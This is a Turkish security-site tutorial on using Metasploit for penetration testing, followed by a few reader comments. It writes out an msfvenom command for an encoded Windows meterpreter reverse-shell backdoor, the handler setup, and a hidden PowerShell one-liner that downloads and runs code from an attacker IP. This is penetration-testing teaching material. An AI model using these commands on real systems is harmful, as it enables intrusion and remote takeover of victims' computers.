ÇözümPark'a hoş geldiniz. Oturum Aç | Üye Ol
 
Ana Sayfa Makale Video Forum Resimler Dosyalar Etkinlik Hizmetlerimiz Biz Kimiz

Güvenlik

Metasploit Nedir? Ve Nasıl Kullanılır? - Bölüm 1

Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.

 

Senaryo 1

 

Öncelikle metasploitin payloadlarını kullanarak bir windows backdoor oluşturalım. Terminal üzerinden “msfvenom –h” parametresini kullanarak daha fazla sonuç alabilirsiniz.  Çalıştıracağımız komutlar şu şekildedir “msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST= LPORT= -f exe -o /root/isim.exe” şeklindedir.

 

Msfvenom = payload oluşturlacağı belirtilir.

-p = parametresi ile payload belirtilir.

-e = encoder seçimi belirtilir.

-i  = encoding işleminin kaçkere tekrarlanacağı belirtilir.

-b = bad characters’ler temizlenir.

LHOST = Saldırganin IP adresi.

LPORT= Saldırganın dinleme yapacağı port.

-f = dosya tipi belirtilir..

-o = hangi dizine kayıt edileceği belirtilir.

clip_image002

Figure 1

Backdoor oluşturma işleminden sonra yeni bir terminal satırı açılır ve "msfconsole -q<grafik göstermesi engellenir.>" şeklinde metasploit çalıştırılır ve backdoor oluşturulurken girilen payload, ıp, port, bilgileri tanımlanır.

 

"use exploit/multi/handler" dönüş geleceği bildirilir.

"set PAYLOAD payload/ismi/seklinde/dizine/girilir"

"set LHOST <saldırgan ip>"

"set LPORT <saldırgan port>"

"exploit <dinleme işlemi başlatılır>"

clip_image004

Figure 2

Karşı tarafta backdoorun çalıştırılma anı;

clip_image005

Figure 3

 

Dinleme yapılan IP ve PORT’a gelen reverse bağalantı.

clip_image007

Figure 4

 

Senaryo 2

 

Öncelikle yeni bir terminal açılır ve “msfconsole” yazılır metasploit çalıştırılır. Burdan sonra ise “use exploit/multi/script/web_delivery” ile exploitin dizinine girilir. Burdan sonra ise saldırganın ip adresi yazılır şu şekilde “set LHOST <saldırgan ip>” bu adımdan sonra ise url path belirebilirsiniz ama otomatik olarak metasploitin oluşturması istenilirse “set URIPATH / “ şeklide yazılarak kendisi oluşturmaktadır, Son olarak “show targets” komutu ile hani dilde oluşturulacağı belirtilir, powershell ile oluşturulmak istenilirse “set TARGET 2 <PSH ID>” şeklinde belirtilir. Son olarak payload girilmektedir (show payloads ile daha detaylı bilgi alabilirsiniz.) meterpreter satırına düşmek istenilirse “set PAYLOAD windows/meterpreter/reverse_tcp” şeklinde girilir.

clip_image009

Figure 5

 

Son olarak “run” komutunu kullarak hem zararlı payloadımızı oluşturuyoruz ve dinlemeye alıyoruz.

Oluşturulan payload görüldüğü gibi şu şekildedir; powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.157.128:8080/');

Powershell.exe = powershell ile çalıştırılacağı belirtilir.

-w hidden = herhangi bir pencere açılmayacak.

-c = "command" yani powershell'in çalıştırılacağı kod anlamına gelir.

$w = internet objesi tanımlanmıştır, proxy varsa bile atlat anlamına gelmektedir.

IEX = http://192.168.157.128:8080/ adresinden powershell kodunu çalıştırılması belirtilmiştir.

clip_image011

Figure 6

 

Hedef sistem saldırganın zararlı scriptini çalıştırdığı an

clip_image013

Figure 7

 

Saldırgana gelen reverse bağlantı.

clip_image015

Figure 8

 

Teşekkürler

Tarih : 21 Mayıs 2017 Pazar 17:36 Yayınlayan: Gökhan YÜCELER

Yorumlar

 

Ertan ERBEK

Ülkede bu konuda ciddi bir açık var, makalelerinizin artası dileği ile.

Mayıs 22, 2017 09:59
 

oğuzhan gıcan

Elinize sağlık Gökhan Bey bu bilgileri başka yerde bulmak imkansız gibi bir şey.

Mayıs 24, 2017 11:55
 

mehmet dağdevirentürk

Elinize Sağlık. Net bir makale olmuş

Haziran 2, 2017 00:44
Kimliksiz yorumlar seçilemez kılınmış durumdadır.

Yazar: Gökhan YÜCELER

15.01.1986 yılında İstanbulda doğan Gökhan YÜCELER, 12 yıldır IT sektöründe değişik görevlerde çalışmış olup, son 8 yıldır bilişim güvenliği alanına yoğunlaşmış bulunmaktadır. Görev aldığı kuruluşlarda bilgi güvenliği uzmanı olarak yer almış olup, bu alanda bir çok projeye imza atmıştır. MayaSoft Bünyesinde, Information Security Specialist olarak kariyerine devam eden Gökhan YÜCELER, güvenlik sızma testleri, adli bilişim incelemeleri, IPS/IDS atlatma teknikleri, DDoS saldırıları tespit ve önleme yöntemleri ve Python Security Scripting üzerine çalışmalar yapmaktadır. Gökhan YÜCELER, MCP, CCNA, CCNP, SNAF, FCNSA, FCNSP, CEH, GPEN sertifikalarına sahiptir.
 

Bu Kategori

Hızlı aktarma

Etiketler